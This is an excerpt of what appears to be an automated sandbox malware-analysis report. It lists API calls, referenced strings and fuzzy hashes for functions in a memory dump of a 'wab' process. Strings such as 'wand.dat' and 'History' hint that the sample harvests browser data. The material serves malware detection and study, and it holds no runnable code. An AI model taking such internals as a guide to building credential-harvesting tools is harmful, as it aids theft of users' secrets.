                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                • API String ID: 1297977491-4203073231
                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                • malloc.MSVCRT ref: 004174BD
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                • String ID:
                                • API String ID: 2903831945-0
                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                APIs
                                • GetParent.USER32(?), ref: 0040D453
                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                • memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                • String ID:
                                • API String ID: 1471605966-0
                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                APIs
                                • wcscpy.MSVCRT ref: 0044475F
                                • wcscat.MSVCRT ref: 0044476E
                                • wcscat.MSVCRT ref: 0044477F
                                • wcscat.MSVCRT ref: 0044478E
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                • String ID: \StringFileInfo\
                                • API String ID: 102104167-2245444037
                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$??3@
                                • String ID: g4@
                                • API String ID: 3314356048-2133833424
                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _memicmpwcslen
                                • String ID: @@@@$History
                                • API String ID: 1872909662-685208920
                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                APIs
                                • memset.MSVCRT ref: 004100FB
                                • memset.MSVCRT ref: 00410112
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 00410141
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                • String ID: </%s>
                                • API String ID: 3400436232-259020660
                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                APIs
                                • memset.MSVCRT ref: 0040D58D
                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ChildEnumTextWindowWindowsmemset
                                • String ID: caption
                                • API String ID: 1523050162-4135340389
                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                APIs
                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                • String ID: MS Sans Serif
                                • API String ID: 210187428-168460110
                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClassName_wcsicmpmemset
                                • String ID: edit
                                • API String ID: 2747424523-2167791130
                                • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID: SHAutoComplete$shlwapi.dll
                                • API String ID: 3150196962-1506664499
                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp
                                • String ID:
                                • API String ID: 3384217055-0
                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                APIs
                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                • GetMenu.USER32(?), ref: 00410F8D
                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                • String ID:
                                • API String ID: 1889144086-0
                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                • GetLastError.KERNEL32 ref: 0041810A
                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                • String ID:
                                • API String ID: 1661045500-0
                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                APIs
                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                • memcpy.MSVCRT ref: 0042EC7A
                                Strings
                                • virtual tables may not be altered, xrefs: 0042EBD2
                                • Cannot add a column to a view, xrefs: 0042EBE8
                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                • API String ID: 1297977491-2063813899
                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                APIs
                                • memset.MSVCRT ref: 0040560C
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.*$dat$wand.dat
                                • API String ID: 2618321458-1828844352
                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • wcslen.MSVCRT ref: 00410C74
                                • _wtoi.MSVCRT ref: 00410C80
                                • _wcsicmp.MSVCRT ref: 00410CCE
                                • _wcsicmp.MSVCRT ref: 00410CDF
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                • String ID:
                                • API String ID: 1549203181-0
                                • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                APIs
                                • memset.MSVCRT ref: 00412057
                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                • GetKeyState.USER32(00000010), ref: 0041210D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                • String ID:
                                • API String ID: 3550944819-0
                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                APIs
                                • wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • memcpy.MSVCRT ref: 0040A94F
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                APIs
                                • wcslen.MSVCRT ref: 0040B1DE
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                • memcpy.MSVCRT ref: 0040B248
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
